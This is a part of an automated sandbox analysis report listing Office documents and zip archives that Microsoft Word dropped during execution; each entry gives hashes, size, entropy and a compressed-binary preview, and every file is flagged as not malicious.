                                                                                                                            MD5:9E563D44C28B9632A7CF4BD046161994
                                                                                                                            SHA1:D3DB4E5F5B1CC6DD08BB3EBF488FF05411348A11
                                                                                                                            SHA-256:86A70CDBE4377C32729FD6C5A0B5332B7925A91C492292B7F9C636321E6FAD86
                                                                                                                            SHA-512:8EB14A1B10CB5C7607D3E07E63F668CFC5FC345B438D39138D62CADF335244952FBC016A311D5CB8A71D50660C49087B909528FC06C1D10AF313F904C06CBD5C
                                                                                                                            Malicious:false
                                                                                                                            Preview:PK.........{MB.f}......p......[Content_Types].xml..`.I.%&/m.{.J.J..t...`.$.@........iG#).*..eVe]f.@....{...{...;.N'...?\fd.l..J..!....?~|.?"....|.{.[..e^7E......Gi..V.by..G..|.......U..t.|..mW...m..|.5.j./..^d-.Y_.]e..E~wog...j...v......?..u....c.v...(=.v........F_..U..G...T.e.y)[..b.......3.m....6.X5.P........_...b../..}.-......~.-..z..d.......j.^.+c..E.V..~3}..U.7..~p.>.E..9^d....4%}.E.$....N..r....<....%...%.?....w.u...h........D...w.....h........Dkw...x..T....T....T....T....T....T....j...."[.J.....;..!4...M...............t.n-.{..skp...[;.......F...j.7...4fC...K1..K/..K-..K+..K)..K'..f9......Fl._.........d0...?7K7].........A.......Fl.............Ft....u.......Ft........\.......w....R.......R.......R........o...].`.....A....#.`..\.....S.._...4...o.........W<x#..............w#...r.nD..]....\.~....|......b...^...Z...V...R...N..W<x......l._...l..?.A......xp_Q..y<h..tL.i.?HNn...]..........r.nD..]~.........wy~7......Ft...........E/|c.
                                                                                                                            Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                                                                                                                            File Type:Zip archive data, at least v2.0 to extract, compression method=deflate
                                                                                                                            Category:dropped
                                                                                                                            Size (bytes):1463634
                                                                                                                            Entropy (8bit):7.898382456989258
                                                                                                                            Encrypted:false
                                                                                                                            SSDEEP:24576:75MGNW/UpLkupMAqDJhNHK4/TuiKbdhbZM+byLH/:7ZwUpLkulkHK46iiDZHeLH/
                                                                                                                            MD5:ACBA78931B156E4AF5C4EF9E4AB3003B
                                                                                                                            SHA1:2A1F506749A046ECFB049F23EC43B429530EC489
                                                                                                                            SHA-256:943E4044C40ABA93BD7EA31E8B5EBEBD7976085E8B1A89E905952FA8DAC7B878
                                                                                                                            SHA-512:2815D912088BA049F468CA9D65B92F8951A9BE82AB194DBFACCF0E91F0202820F5BC9535966654D28F69A8B92D048808E95FEA93042D8C5DEA1DCB0D58BE5175
                                                                                                                            Malicious:false
                                                                                                                            Preview:PK.........{MB.f}......p......[Content_Types].xml..`.I.%&/m.{.J.J..t...`.$.@........iG#).*..eVe]f.@....{...{...;.N'...?\fd.l..J..!....?~|.?"....|.{.[..e^7E......Gi..V.by..G..|.......U..t.|..mW...m..|.5.j./..^d-.Y_.]e..E~wog...j...v......?..u....c.v...(=.v........F_..U..G...T.e.y)[..b.......3.m....6.X5.P........_...b../..}.-......~.-..z..d.......j.^.+c..E.V..~3}..U.7..~p.>.E..9^d....4%}.E.$....N..r....<....%...%.?....w.u...h........D...w.....h........Dkw...x..T....T....T....T....T....T....j...."[.J.....;..!4...M...............t.n-.{..skp...[;.......F...j.7...4fC...K1..K/..K-..K+..K)..K'..f9......Fl._.........d0...?7K7].........A.......Fl.............Ft....u.......Ft........\.......w....R.......R.......R........o...].`.....A....#.`..\.....S.._...4...o.........W<x#..............w#...r.nD..]....\.~....|......b...^...Z...V...R...N..W<x......l._...l..?.A......xp_Q..y<h..tL.i.?HNn...]..........r.nD..]~.........wy~7......Ft...........E/|c.
                                                                                                                            Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                                                                                                                            File Type:Microsoft OOXML
                                                                                                                            Category:dropped
                                                                                                                            Size (bytes):2218943
                                                                                                                            Entropy (8bit):7.942378408801199
                                                                                                                            Encrypted:false
                                                                                                                            SSDEEP:49152:8mwK3gH/l4hM06Wqnnl1IdO9wASFntrPEWNe7:863gHt4hM9WWnMdO9w35PEWK
                                                                                                                            MD5:EE33FDA08FBF10EF6450B875717F8887
                                                                                                                            SHA1:7DFA77B8F4559115A6BF186EDE51727731D7107D
                                                                                                                            SHA-256:5CF611069F281584DE3E63DE8B99253AA665867299DC0192E8274A32A82CAA20
                                                                                                                            SHA-512:AED6E11003AAAACC3FB28AE838EDA521CB5411155063DFC391ACE2B9CBDFBD5476FAB2B5CC528485943EBBF537B95F026B7B5AB619893716F0A91AEFF076D885
                                                                                                                            Malicious:false
                                                                                                                            Preview:PK.........{MBS'..t...ip......[Content_Types].xml..`.I.%&/m.{.J.J..t...`.$.@........iG#).*..eVe]f.@....{...{...;.N'...?\fd.l..J..!....?~|.?"....|.{.[..e^7E......Gi..V.by..G..|.......U..t.|..mW...m..|.5.j./..^d-.Y_.]e..E~wog...j...v......?..u....c...W..G.4D_.}T,.@...}....R.Z..4k.....Y..mEkLor.f^..O..P...`.../.|u1..Y.....nK.......u=..2.tu~^L.Y5]/...~+.v...o....j.`?.S...../.by.|..>."kZbs....H.9..m.z.]W.V.?~v........;...N.......w....;.z..N.......w.....R.._..w._..w._..w._..w._..w._..w.n..Ofu.-..K.e........T..q.F...R[...~.u.....Z..F....7.?.v....5O....zot..i.....b...^...Z...V...R...N...r./.?........=....#.`..\~n.n...)J./.......7........+......Q..]n............w......Ft........|......b...^...Z...V...R...N..W<x......l._...l..?.A......x....x.9.|.8..............u................w#.....nD..]...........R.......R.......R........o...].`.....A....#.`..\.....+J./.......7........+......Q..]n.........w9~7......Ft........|......b...^.c..-...-...-
                                                                                                                            Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                                                                                                                            File Type:Microsoft OOXML
                                                                                                                            Category:dropped
                                                                                                                            Size (bytes):1750795
                                                                                                                            Entropy (8bit):7.892395931401988
                                                                                                                            Encrypted:false
                                                                                                                            SSDEEP:24576:DyeAqDJpUDH3xk8ZKIBuX3TPtd36v4o5d4PISMETGBP6eUP+xSeW3v0HKPsc:uRqUjSTPtd36AFDM/BP6eUeW3v0Fc
                                                                                                                            MD5:529795E0B55926752462CBF32C14E738
                                                                                                                            SHA1:E72DFF8354DF2CB6A5698F14BBD1805D72FEEAFF
                                                                                                                            SHA-256:8D341D1C24176DC6B67104C2AF90FABD3BFF666CCC0E269381703D7659A6FA05
                                                                                                                            SHA-512:A51F440F1E19C084D905B721D0257F7EEE082B6377465CB94E677C29D4E844FD8021D0B6BA26C0907B72B84157C60A3EFEDFD96C16726F6ABEA8D896D78B08CE
                                                                                                                            Malicious:false
                                                                                                                            Preview:PK.........{MB.f}......p......[Content_Types].xml..`.I.%&/m.{.J.J..t...`.$.@........iG#).*..eVe]f.@....{...{...;.N'...?\fd.l..J..!....?~|.?"....|.{.[..e^7E......Gi..V.by..G..|.......U..t.|..mW...m..|.5.j./..^d-.Y_.]e..E~wog...j...v......?..u....c.v...(=.v........F_..U..G...T.e.y)[..b.......3.m....6.X5.P........_...b../..}.-......~.-..z..d.......j.^.+c..E.V..~3}..U.7..~p.>.E..9^d....4%}.E.$....N..r....<....%...%.?....w.u...h........D...w.....h........Dkw...x..T....T....T....T....T....T....j...."[.J.....;..!4...M...............t.n-.{..skp...[;.......F...j.7...4fC...K1..K/..K-..K+..K)..K'..f9......Fl._.........d0...?7K7].........A.......Fl.............Ft....u.......Ft........\.......w....R.......R.......R........o...].`.....A....#.`..\.....S.._...4...o.........W<x#..............w#...r.nD..]....\.~....|......b...^...Z...V...R...N..W<x......l._...l..?.A......xp_Q..y<h..tL.i.?HNn...]..........r.nD..]~.........wy~7......Ft...........E/|c.
                                                                                                                            Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                                                                                                                            File Type:Microsoft OOXML
                                                                                                                            Category:dropped
                                                                                                                            Size (bytes):2924237
                                                                                                                            Entropy (8bit):7.970803022812704
                                                                                                                            Encrypted:false
                                                                                                                            SSDEEP:49152:mc4NEo4XNd5wU5qTkdC4+K9u5b/i40RKRAO/cLf68wy9yxKrOUURBgmai2prH:mJef5yTSoKMF//DRGJwLx9DBaH
                                                                                                                            MD5:5AF1581E9E055B6E323129E4B07B1A45
                                                                                                                            SHA1:B849F85BCAF0E1C58FA841FFAE3476D20D33F2DD
                                                                                                                            SHA-256:BDC9FBF81FBE91F5BF286B2CEA00EE76E70752F7E51FE801146B79F9ADCB8E98
                                                                                                                            SHA-512:11BFEF500DAEC099503E8CDB3B4DE4EDE205201C0985DB4CA5EBBA03471502D79D6616D9E8F471809F6F388D7CBB8B0D0799262CBE89FEB13998033E601CEE09
                                                                                                                            Malicious:false
                                                                                                                            Preview:PK.........{MB.$<.~....p......[Content_Types].xml..`.I.%&/m.{.J.J..t...`.$.@........iG#).*..eVe]f.@....{...{...;.N'...?\fd.l..J..!....?~|.?"....|.{.[..e^7E......Gi..V.by..G..|.......U..t.|..mW...m..|.5.j./..^d-.Y_.]e..E~wog...j...v......?..u....c...W..G.4D_.}T,.@...}....R.Z..4k.....Y..mEkLor.f^..O..P...`..^.......H^..<}...lA-.D.....lI/...hD.Z....|VM..ze........L..tU...g....lQ....Y...>MI...5-....S......h=..u.h..?;h...@k...h...'Z...D...;.....h=..'Z...D...;.....)^./.../U.../..../U.../..../U..?...'.........Ngz..A.~.8.#D....xot.u.?...eyot.n..{..sk....[......Z..F....l...o)..o..o...oi..o)..o..,..b.s......2.C.z.~8.......f......x.9.|.8..............u................r.nD..]...........w.~7...-...-...-...-...-...-....x.&l........>.4.z.~8..........=E....As.1..q. 9....w.7...1........w.}7......Ft...................o)..o..o...oi..o)..o..w.7a...x0...........d0..............A.......Fl.............Ft................w#...r.nD..]..M...K1.0..7....
                                                                                                                            Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                                                                                                                            File Type:Microsoft OOXML
                                                                                                                            Category:dropped
                                                                                                                            Size (bytes):2357051
                                                                                                                            Entropy (8bit):7.929430745829162
                                                                                                                            Encrypted:false
                                                                                                                            SSDEEP:49152:tfVcGO3JiR6SgT7/bOCrKCsaFCX3CzwovQTSwW8nX:pVcG2iRedsaoXSzeOwWEX
                                                                                                                            MD5:5BDE450A4BD9EFC71C370C731E6CDF43
                                                                                                                            SHA1:5B223FB902D06F9FCC70C37217277D1E95C8F39D
                                                                                                                            SHA-256:93BFC6AC1DC1CFF497DF92B30B42056C9D422B2321C21D65728B98E420D4ED50
                                                                                                                            SHA-512:2365A9F76DA07D705A6053645FD2334D707967878F930061D451E571D9228C74A8016367525C37D09CB2AD82261B4B9E7CAEFBA0B96CE2374AC1FAC6B7AB5123
                                                                                                                            Malicious:false
                                                                                                                            Preview:PK.........{MB.f}......p......[Content_Types].xml..`.I.%&/m.{.J.J..t...`.$.@........iG#).*..eVe]f.@....{...{...;.N'...?\fd.l..J..!....?~|.?"....|.{.[..e^7E......Gi..V.by..G..|.......U..t.|..mW...m..|.5.j./..^d-.Y_.]e..E~wog...j...v......?..u....c.v...(=.v........F_..U..G...T.e.y)[..b.......3.m....6.X5.P........_...b../..}.-......~.-..z..d.......j.^.+c..E.V..~3}..U.7..~p.>.E..9^d....4%}.E.$....N..r....<....%...%.?....w.u...h........D...w.....h........Dkw...x..T....T....T....T....T....T....j...."[.J.....;..!4...M...............t.n-.{..skp...[;.......F...j.7...4fC...K1..K/..K-..K+..K)..K'..f9......Fl._.........d0...?7K7].........A.......Fl.............Ft....u.......Ft........\.......w....R.......R.......R........o...].`.....A....#.`..\.....S.._...4...o.........W<x#..............w#...r.nD..]....\.~....|......b...^...Z...V...R...N..W<x......l._...l..?.A......xp_Q..y<h..tL.i.?HNn...]..........r.nD..]~.........wy~7......Ft...........E/|c.
                                                                                                                            Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                                                                                                                            File Type:Microsoft OOXML
                                                                                                                            Category:dropped
                                                                                                                            Size (bytes):3611324
                                                                                                                            Entropy (8bit):7.965784120725206
                                                                                                                            Encrypted:false
                                                                                                                            SSDEEP:49152:ixc1kZBIabo4dTJyr3hJ50gd9OaFxTy+1Nn/M/noivF0po3M0h0Vsm:ixcaAabT83hJLdoaFxTygxcoiX3M0iCm
                                                                                                                            MD5:FB88BFB743EEA98506536FC44B053BD0
                                                                                                                            SHA1:B27A67A5EEC1B5F9E7A9C3B76223EDE4FCAF5537
                                                                                                                            SHA-256:05057213BA7E5437AC3B8E9071A5577A8F04B1A67EFE25A08D3884249A22FBBF
                                                                                                                            SHA-512:4270A19F4D73297EEC910B81FF17441F3FC7A6A2A84EBA2EA3F7388DD3AA0BA31E9E455CFF93D0A34F4EC7CA74672D407A1C4DC838A130E678CA92A2E085851C
                                                                                                                            Malicious:false
                                                                                                                            Preview:PK.........{MB.f}......p......[Content_Types].xml..`.I.%&/m.{.J.J..t...`.$.@........iG#).*..eVe]f.@....{...{...;.N'...?\fd.l..J..!....?~|.?"....|.{.[..e^7E......Gi..V.by..G..|.......U..t.|..mW...m..|.5.j./..^d-.Y_.]e..E~wog...j...v......?..u....c.v...(=.v........F_..U..G...T.e.y)[..b.......3.m....6.X5.P........_...b../..}.-......~.-..z..d.......j.^.+c..E.V..~3}..U.7..~p.>.E..9^d....4%}.E.$....N..r....<....%...%.?....w.u...h........D...w.....h........Dkw...x..T....T....T....T....T....T....j...."[.J.....;..!4...M...............t.n-.{..skp...[;.......F...j.7...4fC...K1..K/..K-..K+..K)..K'..f9......Fl._.........d0...?7K7].........A.......Fl.............Ft....u.......Ft........\.......w....R.......R.......R........o...].`.....A....#.`..\.....S.._...4...o.........W<x#..............w#...r.nD..]....\.~....|......b...^...Z...V...R...N..W<x......l._...l..?.A......xp_Q..y<h..tL.i.?HNn...]..........r.nD..]~.........wy~7......Ft...........E/|c.
                                                                                                                            Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                                                                                                                            File Type:Microsoft OOXML
                                                                                                                            Category:dropped
                                                                                                                            Size (bytes):1091485
                                                                                                                            Entropy (8bit):7.906659368807194
                                                                                                                            Encrypted:false
                                                                                                                            SSDEEP:24576:oBpmCkw3Tg/euEB+UdoC4k7ytHkHA6B/puqW2MIkTeSBmKrZHQ:MR3c/AseydwppC7veSBmWHQ
                                                                                                                            MD5:2192871A20313BEC581B277E405C6322
                                                                                                                            SHA1:1F9A6A5E10E1C3FFEB6B6725C5D2FA9ECDF51085
                                                                                                                            SHA-256:A06B302954A4C9A6A104A8691864A9577B0BFEA240B0915D9BEA006E98CDFFEC
                                                                                                                            SHA-512:6D8844D2807BB90AEA6FE0DDDB9C67542F587EC9B7FC762746164B2D4A1A99EF8368A70C97BAD7A986AAA80847F64408F50F4707BB039FCCC509133C231D53B9
                                                                                                                            Malicious:false
                                                                                                                            Preview:PK...........G`.jaV....P......[Content_Types].xml...n.@...W......T@.mwM.E....)....y...H}.N..ll8.h5g6Q.=3_......?...x..e^Di.p.^.ud...(Y/..{w..r..9.../M...Q*{..E...(.4..>..y,.>..~&..b-.a.?..4Q2Q=.2.......m....>-....;]......N'..A...g.D.m.@(}..'.3Z....#....(+....-q<uq.+....?....1.....Y?Oy......O"..J?....Q$zT.].7.N..Q Wi.....<.........-..rY....hy.x[9.b.%-<.V?.(......;r.+...Q<.;U.....4...!'k...s.&..)'k...d.s..}R....o".D.I..7..7.KL.7..Z.....v..b.5.2].f....l.t....Z...Uk...j.&.U-....&>.ia1..9lhG..Q.P.'P.U}.k..rU..rU..rU..rU..rU..rU..rU..rU_EK_}.zi.....G.........j...r..]..CZ..CZ..CZ..CZ..CZ..CZ..CZ..h.oT/-c..`....7FaBu.@-W.A.]..U}H.U}H.U}H.U}H.U}H.U}H.U}H.U}.-}...e...,..7...&(L.....>.kw...i...i...i...i...i...i...i.......I...U_.....vT.....}..\...v..W.!-W.!-W.!-W.!-W.!-W.!-W.!-W.U...7.....k.pT...0..O.... ...>..>..>..>..>..>..>......f..2V}....W>jO....5..].?.o..oPK...........G.s@.....O......._rels/.rels...J.1.._%..d...t......}...n2!..}6.>..`(.v...K`2...70.
                                                                                                                            Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                                                                                                                            File Type:Microsoft OOXML
                                                                                                                            Category:dropped
                                                                                                                            Size (bytes):608122
                                                                                                                            Entropy (8bit):7.729143855239127
                                                                                                                            Encrypted:false
                                                                                                                            SSDEEP:6144:Ckl6KRKwg9jf2q/bN69OuGFlC/DUhq68xOcJzGYnTxlLqU8dmTW:8yKwgZ2qY9kA7Uhq68H3ybmq
                                                                                                                            MD5:8BA551EEC497947FC39D1D48EC868B54
                                                                                                                            SHA1:02FA15FDAF0D7E2F5D44CAE5FFAE49E8F91328DF
                                                                                                                            SHA-256:DB2E99B969546E431548EBD58707FC001BBD1A4BDECAD387D194CC9C6D15AC89
                                                                                                                            SHA-512:CC97F9B2C83FF7CAC32AB9A9D46E0ACDE13EECABECD653C88F74E4FC19806BB9498D2F49C4B5581E58E7B0CB95584787EA455E69D99899381B592BEA177D4D4B
                                                                                                                            Malicious:false
                                                                                                                            Preview:PK.........LGE,.{E...#P......[Content_Types].xml..Mo.0.....Z..N7.=l......V0.-o..j?...H..sa......./UCb.'...r...w.i..e..<[....{2..U.m..N.{...r.....3.fj.o......2.*....;.L.6..&,D.Cld8...a.gZf.......r-v..><....~/......|Zk.......a.R&.d.(.$..6..}.:.....3......1..[.p.....?..+....R...y,.fod.....e...-.|..#..]j....n:...f...-J...i.^.:Y....T..........m^..~GNp../e}...N....a..5.d.8YcN..5.d.8Y...7..A..e...7Q."3...../.sL._...v...n..b..2].v....n.t....Z...Uk...j.&.Z....im|.r....B.....7DaBuN.... ...>..>..>..>..>..>..>.........V}-.....Q}#.&T..j...r..]..CZ..CZ..CZ..CZ..CZ..CZ..CZ..i.o.,-k..b....7FaBuN.... ...>..>..>..>..>..>..>.........V}-...Q}..&T..j...r..]..CZ..CZ..CZ..CZ..CZ..CZ..CZ..i.o.,-k..b....7EaBuN.... ...>..>..>..>..>..>..>.........V}-...Q}3.&T..j...r..]..CZ..CZ..CZ..CZ..CZ..CZ..CZ..i.o.,-k..b.\}..)...A.......[..PK.........LG.s@.....O......._rels/.rels...J.1.._%..d...t......}...n2!..}6.>..`(.v...K`2...70...........84P....
                                                                                                                            Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                                                                                                                            File Type:Microsoft OOXML
                                                                                                                            Category:dropped
                                                                                                                            Size (bytes):5783
                                                                                                                            Entropy (8bit):7.88616857639663
                                                                                                                            Encrypted:false
                                                                                                                            SSDEEP:96:CDG4D+8VsXzXc2zLXTJ2XFY47pk2G7HVlwFzTXNbMfmn2ivLZcreFWw5fc9ADdZm:CDG4DRGY23l2Xu47GL7YtT9V29yWvWdk
                                                                                                                            MD5:8109B3C170E6C2C114164B8947F88AA1
                                                                                                                            SHA1:FC63956575842219443F4B4C07A8127FBD804C84
                                                                                                                            SHA-256:F320B4BB4E57825AA4A40E5A61C1C0189D808B3EACE072B35C77F38745A4C416
                                                                                                                            SHA-512:F8A8D7A6469CD3E7C31F3335DDCC349AD7A686730E1866F130EE36AA9994C52A01545CE73D60B642FFE0EE49972435D183D8CD041F2BB006A6CAF31BAF4924AC
                                                                                                                            Malicious:false
                                                                                                                            Preview:PK.........A;.h......F.......[Content_Types].xmlz.........MN.0...by.b.,.BI...X `...{..O.S...H\.'.XTP..K{.o.....rg..bL...XM.:.v..c.k...}.D....9.....Bb>.+..G.......+(.u}.w.]...v..{.M&.].>`....nB..B0Z@.e.u..R.......-.&#....aR..`.a..|. 1^......&..|..s.A.t..b..A.i7...7.&....bQK$O.......9....V....Wt_PK........pnB;.M.:....g......._rels/.rels...J.0.._%.n....xp..,{.i2M.........G..........7...3o/.......d.kyU....^..[>Q....j.#P.H......Z>..+!...B*|@...G...E....E]..".3.......!..7....,:..,.......Ot..0r....Z..&1..U..p.U-.[Uq&.......................Gyy.}n.(.C(i.x........?.vM..}..%.7.b.>L..]..PK........EV:5K..4....H......diagrams/layout1.xml.Yo.6........S.`......$M...Q8A...R..T.k...K.4CQG..}.A..9.?R....!&...Q..ZW.......Q....<8..z..g....4{d.>..;.{.>.X.....Y.2.......cR....9e.. ...}L.....yv&.&...r..h...._..M. e...[..}.>.k..........3.`.ygN...7.w..3..W.S.....w9....r(....Zb..1....z...&WM.D<......D9...ge......6+.Y....$f......wJ$O..N..FC..Er........?..is...-Z
                                                                                                                            Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                                                                                                                            File Type:Microsoft OOXML
                                                                                                                            Category:dropped
                                                                                                                            Size (bytes):4026
                                                                                                                            Entropy (8bit):7.809492693601857
                                                                                                                            Encrypted:false
                                                                                                                            SSDEEP:96:VpDCBFLhxaUGm5EWA07yNdKH1FQpy8tnX8Iz3b7TrT502+fPD:VpDYFFRMNU+RtXzLf35t+3D
                                                                                                                            MD5:5D9BAD7ADB88CEE98C5203883261ACA1
                                                                                                                            SHA1:FBF1647FCF19BCEA6C3CF4365C797338CA282CD2
                                                                                                                            SHA-256:8CE600404BB3DB92A51B471D4AB8B166B566C6977C9BB63370718736376E0E2F
                                                                                                                            SHA-512:7132923869A3DA2F2A75393959382599D7C4C05CA86B4B27271AB9EA95C7F2E80A16B45057F4FB729C9593F506208DC70AF2A635B90E4D8854AC06C787F6513D
                                                                                                                            Malicious:false
                                                                                                                            Preview:PK........YnB;.h......F.......[Content_Types].xmlz.........MN.0...by.b.,.BI...X `...{..O.S...H\.'.XTP..K{.o.....rg..bL...XM.:.v..c.k...}.D....9.....Bb>.+..G.......+(.u}.w.]...v..{.M&.].>`....nB..B0Z@.e.u..R.......-.&#....aR..`.a..|. 1^......&..|..s.A.t..b..A.i7...7.&....bQK$O.......9....V....Wt_PK........bnB;?.......f......._rels/.rels...J.1.._%..f....m/.,x...&.lt.dV.y.|.."v....q..|......r..F..)..;.T5g.eP..O..Z.^-.8...<.Y....Q.."....*D.%.!9.R&#".'0(.u}).!..l....b..J..rr....P.L.w..0.-......A..w..x.7U...Fu<mT.....^s...F./ ..( .4L..`.....}...O..4.L...+H.z...m..j[].=........oY}.PK........J.L6...m....,.......diagrams/layout1.xml.X.n.8.}N.....PG.............wZ.,.R.%.K...J.H]....y.3..9...O..5."J.1.\.1....Q....z......e.5].)...$b.C)...Gx!...J3..N..H...s....9.~...#..$...W.8..I`|..0xH}......L.|..(V;..1...kF..O=...j...G.X.....T.,d>.w.Xs.......3L.r..er\o..D..^....O.F.{:.>.R'....Y-...B.P.;....X.'c...{x*.M7..><l.1.w..{].46.>.z.E.J.......G......Hd..$..7....E.
                                                                                                                            Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                                                                                                                            File Type:Microsoft OOXML
                                                                                                                            Category:dropped
                                                                                                                            Size (bytes):4243
                                                                                                                            Entropy (8bit):7.824383764848892
                                                                                                                            Encrypted:false
                                                                                                                            SSDEEP:96:22MQe4zHye8/djzF+JjvtmMkkBpF7e0LTkaf:22De4zHHCvF+nRBDXoaf
                                                                                                                            MD5:7BC0A35807CD69C37A949BBD51880FF5
                                                                                                                            SHA1:B5870846F44CAD890C6EFF2F272A037DA016F0D8
                                                                                                                            SHA-256:BD3A013F50EBF162AAC4CED11928101554C511BD40C2488CF9F5842A375B50CA
                                                                                                                            SHA-512:B5B785D693216E38B5AB3F401F414CADACCDCB0DCA4318D88FE1763CD3BAB8B7670F010765296613E8D3363E47092B89357B4F1E3242F156750BE86F5F7E9B8D
                                                                                                                            Malicious:false
                                                                                                                            Preview:PK........NnB;.h......F.......[Content_Types].xmlz.........MN.0...by.b.,.BI...X `...{..O.S...H\.'.XTP..K{.o.....rg..bL...XM.:.v..c.k...}.D....9.....Bb>.+..G.......+(.u}.w.]...v..{.M&.].>`....nB..B0Z@.e.u..R.......-.&#....aR..`.a..|. 1^......&..|..s.A.t..b..A.i7...7.&....bQK$O.......9....V....Wt_PK........TnB;..d.....h......._rels/.rels...J.0.._%.n..)"....<.w.&.4..!...y.|.........|.&3.o.....S..K.T5g.U....g..n.f....T*.hcf...D.V..Ft....d....c2".z.....N.s._2....7.0.V.]P.CO?...`...8....4&......_i..Y.T...Z...g....{-...]..pH..@.8....}tP.)..B>..A...S&......9..@...7........b_.PK........r};5.z..............diagrams/layout1.xml.X.n.8.}.........4.+.(...@......(..J..._.!)..b..v.}.H..zf8...dhM....E..I.H..V.Y.R..2zw5L~....^..]...J_..4.\.\......8..z..2T..".X.l.F#......5....,*....c....r.kR.I.E..,.2...&%..''.qF.R.2.....T;F...W.. ...3...AR.OR.O..J}.w6..<...,.x..x....`g?.t.I.{.I...|X..g.....<BR..^...Q.6..m.kp...ZuX.?.z.YO.g...$.......'.]..I.#...]$/~`${.
                                                                                                                            Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                                                                                                                            File Type:Zip archive data, at least v2.0 to extract, compression method=deflate
                                                                                                                            Category:dropped
                                                                                                                            Size (bytes):16806
                                                                                                                            Entropy (8bit):7.9519793977093505
                                                                                                                            Encrypted:false
                                                                                                                            SSDEEP:384:eSMjhqgJDGwOzHR3iCpK+QdLdfufFJ9aDn9LjDMVAwHknbz7OW:eSkhqglGwERSAHQdLhDn9AKokv7H
                                                                                                                            MD5:950F3AB11CB67CC651082FEBE523AF63
                                                                                                                            SHA1:418DE03AD2EF93D0BD29C3D7045E94D3771DACB4
                                                                                                                            SHA-256:9C5E4D8966A0B30A22D92DB1DA2F0DBF06AC2EA75E7BB8501777095EA0196974
                                                                                                                            SHA-512:D74BF52A58B0C0327DB9DDCAD739794020F00B3FA2DE2B44DAAEC9C1459ECAF3639A5D761BBBC6BDF735848C4FD7E124D13B23964B0055BB5AA4F6AFE76DFE00
                                                                                                                            Malicious:false
                                                                                                                            Preview:PK.........T.>................[Content_Types].xmlz.........=N.1...b.Eko(.B....(.Pp..=.u.?.....#q..ND.!$.J{.o....G..[Cv.....+.R.Nx..........0."u..S...$&.....Je..B..x......m......M^z....f....|...N..Q..z.!.- .2.9y.i.8j...........0.AE..p.s~@../jw.#8.I.#....4.~Cl.:#h..f.PU.s.~........(.)F..Y......^x..PK.........T.>...V....L......._rels/.rels...J.@.._e..]AD.....x....3.t..T.w.\ZpA<x......v..'....z.........Y..[...<..2.TT....Q$.!.=.....&C....b".F.q.7...X3...7.8.N.}.. ?..8...#..,.L.3.#e...wZpZ.]S..:....t.....{..6.7.|..,dH.e..K 7-}.~.v...5.......b..PK........Ul.<..<"I5...&......diagrams/layout1.xml.}.r.I..s........~Y.f.gzfv......E."w.K..J5m.e...4.0..Q... A.!...%...<...3.......O.......t~.u{...5.G......?,.........N......L......~.:....^,..r=./~7_..8............o.y......oo.3.f........f.......r.7../....qrr.v9.......,?..._O.....?9.O~]..zv.I'.W..........;..\..~....../........?~..n.....\}pt.........b,~...;>.=;>:..u.....?.......2]..]....i......9..<.p..4D..
                                                                                                                            Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                                                                                                                            File Type:Zip archive data, at least v2.0 to extract, compression method=deflate
                                                                                                                            Category:dropped
                                                                                                                            Size (bytes):11380
                                                                                                                            Entropy (8bit):7.891971054886943
                                                                                                                            Encrypted:false
                                                                                                                            SSDEEP:192:VJcnLYnAVbOFLaCPLrGGbhaWEu6d3RmryqLkeAShObPb1AYcRMMXjkfa0nYBwggD:VcMC8lLrRbhy1ZqLyShYb1FHQ4C0nYQJ
                                                                                                                            MD5:C9F9364C659E2F0C626AC0D0BB519062
                                                                                                                            SHA1:C4036C576074819309D03BB74C188BF902D1AE00
                                                                                                                            SHA-256:6FC428CA0DCFC27D351736EF16C94D1AB08DDA50CB047A054F37EC028DD08AA2
                                                                                                                            SHA-512:173A5E68E55163B081C5A8DA24AE46428E3FB326EBE17AE9588C7F7D7E5E5810BFCF08C23C3913D6BEC7369E06725F50387612F697AC6A444875C01A2C94D0FF
                                                                                                                            Malicious:false
                                                                                                                            Preview:PK.........T.>................[Content_Types].xmlz.........=N.1...b.Eko(.B....(.Pp..=.u.?.....#q..ND.!$.J{.o....G..[Cv.....+.R.Nx..........0."u..S...$&.....Je..B..x......m......M^z....f....|...N..Q..z.!.- .2.9y.i.8j...........0.AE..p.s~@../jw.#8.I.#....4.~Cl.:#h..f.PU.s.~........(.)F..Y......^x..PK.........T.>...V....L......._rels/.rels...J.@.._e..]AD.....x....3.t..T.w.\ZpA<x......v..'....z.........Y..[...<..2.TT....Q$.!.=.....&C....b".F.q.7...X3...7.8.N.}.. ?..8...#..,.L.3.#e...wZpZ.]S..:....t.....{..6.7.|..,dH.e..K 7-}.~.v...5.......b..PK........q.~<.6..9 ...e......diagrams/layout1.xml..r.........{.]..u...xv7b.....HPd....t.q...b.i_a.'..P.f.3..F..1...U.u.*.2......?}..O..V.....yQ.Mf........w.....O....N.........t3;...e....j.^.o&.....w...../.w................e.................O..,./..6...8>^.^..........ru5...\.=>[M?......g..........w.N....i.........iy6.?........>.......>{yT...........x.........-...z5.L./.g......_.l.1.....#...|...pr.q
                                                                                                                            Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                                                                                                                            File Type:Microsoft OOXML
                                                                                                                            Category:dropped
                                                                                                                            Size (bytes):6024
                                                                                                                            Entropy (8bit):7.886254023824049
                                                                                                                            Encrypted:false
                                                                                                                            SSDEEP:96:bGa2onnLYHTSSxpHVTSH1bywZKmpRqiUtFvS9xrPooBpni6eDa16MUELHsrKjRBA:SJonLYzSSr1TuZNwtFZKpiiyrKXuCUd
                                                                                                                            MD5:20621E61A4C5B0FFEEC98FFB2B3BCD31
                                                                                                                            SHA1:4970C22A410DCB26D1BD83B60846EF6BEE1EF7C4
